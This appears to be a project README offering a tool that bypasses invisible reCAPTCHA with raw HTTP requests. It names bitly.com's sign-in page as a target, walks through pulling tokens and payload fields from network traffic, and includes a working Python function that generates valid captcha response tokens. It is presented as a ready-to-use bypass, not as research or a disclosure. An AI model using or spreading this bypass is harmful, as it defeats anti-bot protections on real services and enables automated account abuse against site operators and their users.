Allows to bypass an invisible recaptcha just with HTTP requests, without Selenium or OCR.
1 - This bypass does not work on all invisible recaptchas, you have to try it to know if it works on your recaptcha;
2 - This bypass only works on invisible recaptchas.
3 - You must have some knowledge of HTTP requests to understand
TARGET : https://bitly.com/a/sign_in
Inspect network to find the recaptcha anchor url.
Inspect network to find the recaptcha reload url.
Let's now look at the payload of the reload request
1 - Find CHR [xx, xx, xx]
2 - Find VH (The number sequence after the character *)
3 - Find BG (Not me :D, the other BG inside the payload from the character ! to the character *)
Starts here
Ends here
Run bypass.py with python3 and fill inputs.
Recaptcha is vulnerable :D we can generate the recaptcha response with HTTP requests !
Go in the bypassed.txt file, take the variables and you can now create your script to generate the recaptcha response.
import requests
def generateresponse(anchorurl, reloadurl, payload):
s = requests.Session()
r1 = s.get(anchorurl).text
token1 = r1.split('recaptcha-token" value="')[1].split('">')[0]
payload = payload.replace("<token>", str(token1))
r2 = s.post(reloadurl, data=payload, headers={"Content-Type": "application/x-www-form-urlencoded"})
try:
token2 = str(r2.text.split('"rresp","')[1].split('"')[0])
return token2
except:
return ""
Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.
Please make sure to update tests as appropriate.
blank <3